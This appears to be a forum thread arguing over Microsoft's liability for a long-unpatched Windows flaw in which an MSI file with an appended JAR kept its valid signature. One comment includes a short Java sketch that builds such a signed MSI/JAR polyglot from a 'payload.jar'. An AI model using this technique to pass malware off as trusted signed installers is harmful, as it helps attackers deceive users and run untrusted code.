
What about criminal liability? I know that it's highly unlikely that Microsoft will ever get what it truly deserves (at least as long as the USA remains what it is), but still.

I find it rather telling how many argue that Microsoft is (obviously) wrong in its behavior, yet I don't read much about how the company deserves severe punishment (maybe even a forced break-up, or having control taken away from it altogether) for knowingly not fixing a security fuck-up like this, for this long. Maybe an interesting case for anthropologists one day, to study social/cultural conditioning.

I'm sure that Microsoft will have its reasons and considerations, but that should not excuse or exclude them from liability for the consequences of their actions. Whether that will ever succeed in court, given the reality of what both Microsoft and the USA are (many other countries too, by extension), is another story. But it should not take rocket science to figure out that it will only get worse if Microsoft gets away with this without repercussions (again). Guess how we got here in the first place.



How would you define criminal liability to achieve this?

You have a bug that, at best, allows a third-party runtime to execute a malicious program without warning the user that the program is untrusted. Practically, how would you write a statute so that this case would be different from Windows not warning about a malicious file in $arbitrary third-party file format$ that exploits a bug in $arbitrary third-party software$? You don't want vendors legally responsible for the behavior of third-party code on their systems; that's how you get entirely walled-garden platforms that have no user freedom.


Laws don't need to be that specific; that's what the legal system is for. So instead terms like negligence are used, which have very specific legal meanings, and then people consider whether Microsoft was legally negligent in its behavior. The downside is that it's more vague, but the upside is that it can rapidly evolve over time as new information comes to light.

https://legal-dictionary.thefreedictionary.com/negligence


Laws don't necessarily need to be specific, but if you rely solely on interpretation to distinguish between different types of responsibility involving third-party software, you will get either (1) appeals courts defining responsibility as narrowly as possible, or (2) the complete destruction of third-party software and all independent software development, as no vendor is willing to risk the exposure.


Liability is always limited to the value of the company. Thus even in the extreme case, liability would at worst force companies to run each piece of software as its own legal entity. In other words, Microsoft is going to keep selling Windows as an OS even if they need to spin off a subsidiary.


Well, then you've still destroyed small independent software vendors, open source projects, and individual projects for which the cost and complications of running an LLC as a liability shield are unsustainable.

The issue with defining liability here is primarily what conduct should make a company liable in the first place (and doing so in a way without horrible consequences for user freedom), not what the damages can be.


> How would you define criminal liability to achieve this?

Easy. If a producer of software is made aware of a defect in their software that may lead to a breach of security, they are required to either fix it within X days or publicly disclose the full details of the vulnerability, so that users of the software may make an informed decision on how to proceed.

You could even say that if they disclose that there is a vulnerability along with a temporary workaround, they get an extension of time to fix it or release the details.

Edit: after reading what I wrote I think it actually should apply to all bugs, not just security related ones. Either fix it, or let everyone know about it.


In this case, the worst extent of the flaw is that Windows doesn't warn that a file used by a piece of third-party software could be dangerous. If you want a case like this to involve liability, that's what you have to include.

> If a producer of software is made aware of a defect in their software that may lead to a breach of security

Now, I can guarantee you 100%, based on its track record, that a code execution and sandbox vulnerability exists right now in Adobe PDF readers. Should Windows be required to warn users before opening a PDF file that it could be dangerous? What would be different for any other non-trivial software that consumes a non-trivial file format?

It is by no means a stretch to say that if Microsoft is liable in this case, they must be liable for not warning users on a whole host of other issues with third-party software.

I'm generally in favor of some kind of serious liabilities for vulnerabilities, but let's not pretend defining liability in an effective way is easy.


In this case the defect is with how Microsoft handles MSI files. It is Microsoft's problem to fix.

> Now, I can guarantee you 100%, based on its track record, that a code execution and sandbox vulnerability exists right now in Adobe PDF readers. Should Windows be required to warn users before opening a PDF file that it could be dangerous? What would be different for any other non-trivial software that consumes a non-trivial file format?

No, they should only have to make a public release about their own known defects. They shouldn't even have to notify users directly, just make it publicly known. Though it would be nice if they kept track of other vendors' defects and alerted users.


> In this case the defect is with how Microsoft handles MSI files

Except, of course, that Windows is absolutely correct in validating them as an MSI file. It just happens that it fails to correctly validate a file that is both a valid MSI and a valid JAR. Windows itself is incapable of doing anything dangerous with the (from its perspective) nonsense data appended beyond the validated contents of the file.

This is essentially a TOCTOU bug involving one vendor performing the check (MS) and one vendor performing the use (whoever shipped the JRE), both of which are technically correct in the most narrowly-scoped sense but produce a significant issue when combined.
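
To make that concrete, here's a rough, untested sketch (file names are made up) of how such a polyglot is put together. The Authenticode hash of an MSI covers its structured-storage contents, so bytes appended after them reportedly didn't invalidate the signature at the time, while JAR/ZIP readers locate the archive by scanning backwards from the end of the file:

    import java.io.IOException;
    import java.nio.file.Files;
    import java.nio.file.Path;
    import java.nio.file.StandardOpenOption;

    // Illustrative sketch only; "signed.msi" and "payload.jar" are hypothetical inputs.
    public class PolyglotSketch {
        public static void main(String[] args) throws IOException {
            byte[] msi = Files.readAllBytes(Path.of("signed.msi"));   // a validly signed MSI
            byte[] jar = Files.readAllBytes(Path.of("payload.jar"));  // an arbitrary JAR

            // Concatenate: at the time of the report the result still validated as the
            // original signed MSI, yet "java -jar polyglot.msi" would execute the appended JAR.
            Path out = Path.of("polyglot.msi");
            Files.write(out, msi);
            Files.write(out, jar, StandardOpenOption.APPEND);
        }
    }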


In the case of Adobe PDF readers, I think their point would be that Adobe should notify the users, not Windows itself. That's how I interpreted it.


Sure, one would want Adobe to be the liable party in such a case. But that case wouldn't be too different from the current one, where the problem is Windows failing to warn on a file that is otherwise harmless but becomes harmful when opened by a piece of third-party software.


I don't think it's fair to characterize this as a JRE bug. The only programs that had the opportunity to catch this, the ones that recognized the file as a signed MSI, did not account for it. The JRE can't be expected to know that the valid JAR it's reading was considered an MSI by Edge or whatever piece of software processed it, despite the file being dispatched to the JRE from Explorer.


It's not a bug in the JRE, but the bug is a problem because Windows itself doesn't see the file as dangerous, while the JRE invoked on it treats it as code to execute. Windows, on its own, is not aware that the file represents executable code outside of the validated sections of the MSI.


It's absolutely a bug in the JRE that its executable format a) is completely unsigned and b) allows crap at the start of it.

If there's a bug in Windows here, there's a bug in the JRE.
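
To be concrete about "allows crap at the start of it": ZIP (and therefore JAR) readers locate the archive via the End of Central Directory record near the end of the file, so leading bytes are tolerated by design (it's also what makes self-extracting archives work). A quick sketch with the standard library, using the same hypothetical polyglot file name as above:

    import java.io.File;
    import java.io.IOException;
    import java.util.zip.ZipEntry;
    import java.util.zip.ZipFile;

    // java.util.zip finds the archive by the End of Central Directory record near the
    // end of the file, so any bytes in front of the ZIP data (even a whole signed MSI)
    // are simply ignored.
    public class PrefixedZipDemo {
        public static void main(String[] args) throws IOException {
            try (ZipFile zip = new ZipFile(new File("polyglot.msi"))) {
                zip.stream()
                   .map(ZipEntry::getName)
                   .forEach(System.out::println); // lists the appended JAR's entries
            }
        }
    }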


I disagree; the JRE is a virtual machine. If not for the OS, how would you protect against it? Isn't the OS itself responsible for deciding whether the invocation of the JRE process is authorized, rather than the virtual machine itself?

Are there any comparable virtual machines that require signed bytecode by default? I've personally never heard of it; most of the time it's verified when the package is downloaded, rather than when it's executed.


Java applets did actually have their own security model using signatures, which did not necessarily require the host OS to be part of that verification.
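
For completeness, that verification machinery is still in the JRE itself; a signed JAR can be checked from Java without the OS being involved, roughly like this (untested sketch, jar name hypothetical):

    import java.io.File;
    import java.io.IOException;
    import java.io.InputStream;
    import java.util.Enumeration;
    import java.util.jar.JarEntry;
    import java.util.jar.JarFile;

    // With verification enabled, reading a tampered signed entry throws a
    // SecurityException; getCodeSigners() reports who signed each entry.
    public class JarSignatureCheck {
        public static void main(String[] args) throws IOException {
            try (JarFile jar = new JarFile(new File("signed-app.jar"), true)) {
                Enumeration<JarEntry> entries = jar.entries();
                while (entries.hasMoreElements()) {
                    JarEntry entry = entries.nextElement();
                    try (InputStream in = jar.getInputStream(entry)) {
                        in.readAllBytes(); // entries must be read fully before signers are known
                    }
                    System.out.println(entry.getName() + " signed: "
                            + (entry.getCodeSigners() != null));
                }
            }
        }
    }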


The JRE is a runtime for running arbitrary code; that's its whole purpose. If you can put something at the start of a JAR, you can put whatever you want in the JAR. Meanwhile, Windows knows that this will be run by the JRE, because when you open it from Explorer it is associated with the JRE, while the part that validates the file considers it an MSI.

Windows is basically completely responsible for this: Windows validates the MSI, Windows knows what an MSI is, and Windows knows it will be run by the JRE yet validates it just as an MSI instead.


To be fair, all Windows knows is that a program, in this case the JRE, is registered to open the file. Nothing about that necessarily means "this file will be executed", nor that the program will interpret the file differently than Windows has.


> Windows, on its own, is not aware that the file represents executable code outside of the validated sections of the MSI.

I think Windows is aware of this, though: it's called a JAR, and Explorer says the JRE should open it. Furthermore, should there be any sections in a signed MSI that aren't signed? Could that serve any legitimate purpose? No, it entirely defeats the purpose of signing it.


Allowing "unreachable" unsigned data to be appended to an MSI isn't really a threat in and of itself, since the data shouldn't be reachable from any of the valid parts of the file. I could easily see some tools appending their own metadata to the end of the file and thus actually relying on such modification not invalidating the signature.

I would not be surprised if part of the delay fixing this involved MS finding out early on that a major user of MSI files was actually relying on this (perhaps some installer creation tool or AV scanner?) and decided that the user needed to fix their product and distribute the fixed version before a Windows patch was viable.


The malware is in a JAR, a data file executed by Oracle's VM. It's a bit much to hold Microsoft liable for the behavior of third-party software.

I could write a program that deletes your hard drive if you run a script named "delete me.jpg". Should Microsoft be liable?


Microsoft claims to be able to tell whether a file is signed, and to warn if it is not. They found out two years ago that this functionality has a problem. If they had turned around and released a report saying they knew it doesn't work for JAR files, then they shouldn't be liable, but they didn't do that.


There is probably something in the contract that says that Microsoft is not criminally liable. I trust their lawyers for that.

But if companies become criminally liable for bugs, this could be bad news for open source projects. For example: my company wants to use some GPL software, but we need some extra features, so, following the license, I implement them and release the source. The original maintainers like it and put it into the official tree. Unfortunately, my contribution introduces a serious security flaw in some other part that my company doesn't use; we simply overlooked that part. It is our fault, but we didn't mean any harm. We may even have seen the CVE, but because it wasn't about something we used, we didn't look into it. And suddenly, just because we did everything by the rules and released our source code, we are criminally liable... That kind of thing makes you think twice before you contribute to any open source project...

Usually open source projects have a very big "we are not responsible for anything, to the maximum extent permitted by law" warning to avoid this kind of problem. Companies are of course free to provide additional guarantees on derived products; that's one business model for open source developers.

But if you make a law where software developers are responsible for their bugs no matter the contract, even if there is no ill intent, this is going to be a problem.


> What about criminal liability?

You are pointing at a huge elephant in the room. When it comes to software, companies have incredible leeway.

A company can develop some very popular software and earn billions while also inserting malware or simply leaving vulnerabilities unpatched without any repercussion.

It is even legal to discover vulnerabilities in your own software and sell them (anonymously) on the 0-day market.


> What about criminal liability?

What about it? "The software is provided as is", remember?


Have my upvote, but I feel that as long as vendors can get away with that clause, nobody should be punished for CFAA violations either:

"Provided as is" => "Used as is" ;-)


As much as I'd love to see it, I don't see the damage. Users these days have the choice to download and install a free OS. This is a clear case of vote with your wallet. There are tons of operating systems; why stick with Microsoft at this point?


The problem with “the market will sort itself” takes like this is that the market is not as efficient and elastic as we would ideally hope. It assumes, first of all, that everyone has the ability and knowledge to pick the operating system that is best for them. Things like marketing, personally critical (but platform-dependent) software (as the other child comment says), market share, and previously formed platform comfort all influence the decisions that users and developers make regarding an OS. Not to mention the possibility that someone needs to use two different operating systems for two different tasks.

If everyone at once decided that they were no longer using Windows, it's not controversial that there would at least still be a massive amount of work and time needed to shift every legacy system on Windows to another platform. Even in this most extreme example of the market shifting, Windows still has the security issues during the transition timeframe, which the market alone can't solve.


Can you explain why you are claiming this as a "problem"? There is no reason to think that anyone is qualified to tell others what products they should or shouldn't buy. The idea that people need to be "saved" from making wrong purchasing decisions is abhorrent.


> There is no reason to think that anyone is qualified to tell others what products they should or shouldn't buy.

What nonsense is this?! Do you maybe mean "can or can't buy"? Otherwise, I don't see how this statement can be parsed such that it isn't obviously incorrect.


There are lots of possible choices, but if you depend on software not available on other platforms, it doesn't matter. If Microsoft doesn't do their job once properly notified, they deserve a slap on the wrist.


Maybe if the exploit is actually leveraged to cause damages. Outside of that, you think they should get fined because the possibility for exploit is there?

Edit: for clarity, I think fines are appropriate when/if damage occurs; my reply was about the case where notification happens without the bug actively being exploited.


The OP reports exploits in the wild.



